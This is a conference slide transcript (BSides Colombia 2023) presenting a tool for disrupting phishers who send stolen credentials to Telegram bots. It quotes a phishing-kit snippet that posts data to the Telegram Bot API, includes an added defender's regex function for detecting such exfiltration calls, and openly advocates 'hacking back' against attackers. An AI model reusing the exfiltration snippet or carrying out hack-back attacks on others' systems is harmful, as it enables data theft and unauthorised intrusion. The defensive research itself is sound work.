Introducing Telegram-hitbackscammer
A practical approach to fight and hack back against threat actors who use Telegram bots for exfiltration
Contents
01 The use of Telegram as part of the current threat landscape
02 How this research started
03 Final product of this research as response to mitigate these issues
About me
Just a guy with the goal of overcoming himself
Threat Intel, Digital Forensics, Malware Analysis, CloudSec, Pentesting… These little things…
GCFA, GCPN, CISM, CSX, PMP, IA-ISO27001
University Teacher – Researcher – Speaker
Lover of nature, Musician
IBMer, X-Force Incident Response
Phishing dear phishing…
So, what's the fuss?
Phishing/Smishing
1. Weaponization: Attacker gets a Telegram bot using the BotFather for malicious purposes
2. Delivery: Victims fill data managed by malicious bot
3. Impact and monetization: Credentials stolen for money transfer/withdraw
POST REQUEST
…
var settings = {
  "async": true,
  "crossDomain": true,
  "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage",
  "method": "POST",
…
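Added example (not from the talk or the telegram-hitbackscammer project): a JavaScript triage function a defender can run over captured phishing-kit source to flag Telegram Bot API call sites, covering both the concatenated URL form shown in the snippet above and a token written directly into the URL. The sample kit, its tokens and all function names are constructed for this example, and the bot-token shape (numeric id, colon, secret) is an assumption.

```javascript
// Added example, not from the talk or the telegram-hitbackscammer project.
// SAMPLE_KIT is constructed for this example; both tokens are fake placeholders.
const SAMPLE_KIT = `
var telegram_bot_id = "0000000000:FAKE_TOKEN_constructed_for_example_0";
var settings = {
  "async": true,
  "crossDomain": true,
  "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage",
  "method": "POST"
};
fetch("https://api.telegram.org/bot1111111111:ANOTHER_fake_token_for_the_example/sendDocument");
`;

// Token embedded directly in the URL. Assumed token shape: <numeric bot id>:<secret>.
// Only the numeric id is captured, so the secret half never enters a report.
const LITERAL = /https:\/\/api\.telegram\.org\/bot(\d+):[\w-]+\/(\w+)/g;

// URL assembled by string concatenation, as in the slide's snippet.
const CONCAT =
  /["']https:\/\/api\.telegram\.org\/bot["']\s*\+\s*([A-Za-z_$][\w$]*)\s*\+\s*["']\/(\w+)/g;

// Look for a string assignment to the concatenated variable and return the bot id.
function resolveBotId(source, name) {
  const escaped = name.replace(/[$]/g, "\\$&");
  const assign = new RegExp(
    "(?:^|[^\\w$])" + escaped + "\\s*=\\s*[\"'](\\d+):[\\w-]+[\"']"
  );
  const m = assign.exec(source);
  return m ? m[1] : null;
}

// 1-based line number of a match offset, for pointing an analyst at the call site.
function lineOf(source, index) {
  return source.slice(0, index).split("\n").length;
}

// Returns one finding per Telegram Bot API call site, in source order.
function findTelegramExfil(source) {
  const findings = [];
  for (const m of source.matchAll(LITERAL)) {
    findings.push({ line: lineOf(source, m.index), form: "literal",
                    method: m[2], botId: m[1], variable: null });
  }
  for (const m of source.matchAll(CONCAT)) {
    findings.push({ line: lineOf(source, m.index), form: "concatenated",
                    method: m[2], botId: resolveBotId(source, m[1]), variable: m[1] });
  }
  return findings.sort((a, b) => a.line - b.line);
}

console.log(findTelegramExfil(SAMPLE_KIT));
```

A finding with a null botId means the concatenated variable is not assigned a string literal in the same file, so the kit's other scripts need to be searched for it.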
Researching and thinking
Finally
H3llo w0rld!
What can I do to f*ck up these dudes?
Logo hmm
Hmm… Logo
…
Oh yes! Let’s code
So, what is Telegram-hitbackscammer?
A set of protocols to screw up the malicious activities of phishers who store the victim's stolen data on Telegram chats/channels
Attribution, Annoyance, Attack
Cybersec theories behind Telegram-hitbackscammer
Triple A of Active Defense
Researchers, Threat hunters, Incident Responders, Developers
Attribution: Trying to unmask the attackers
Annoyance: Wasting an attacker’s time
Attack: It is hacking… back using pentest tricks
D.E.M.O?
Is there a demo… Nope, there is not?
https://github.com/avechuch0/telegram-hitbackscammer
Of course there is, just kidding ☺
Closing thoughts
Charity / Crowdfunding / Sponsorship
The current malicious Telegram ecosystem is huge to process!
Closing thoughts
Be sure to hack… for good ALWAYS
Spread the word, take it, and use it
https://github.com/avechuch0/telegram-hitbackscammer
QUESTIONS?
@avechuch0
Jaime Andrés Bello Vieda
Thanks For Watching
www.bsidesco.org
April 2023
Colombia

Introducing Telegram-hitbackscammer | BSides Colombia 2023
